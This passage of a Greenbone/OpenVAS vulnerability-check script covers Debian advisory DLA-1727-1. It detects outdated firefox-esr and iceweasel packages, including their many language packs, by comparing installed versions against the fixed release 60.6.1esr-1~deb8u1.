2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/03/msg00029.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1727-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox-esr'\n package(s) announced via the DLA-1727-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\");\n\n script_tag(name:\"affected\", value:\"'firefox-esr' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n60.6.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ia\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-my\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ne-np\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-oc\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ur\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ia\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ka\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kab\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = 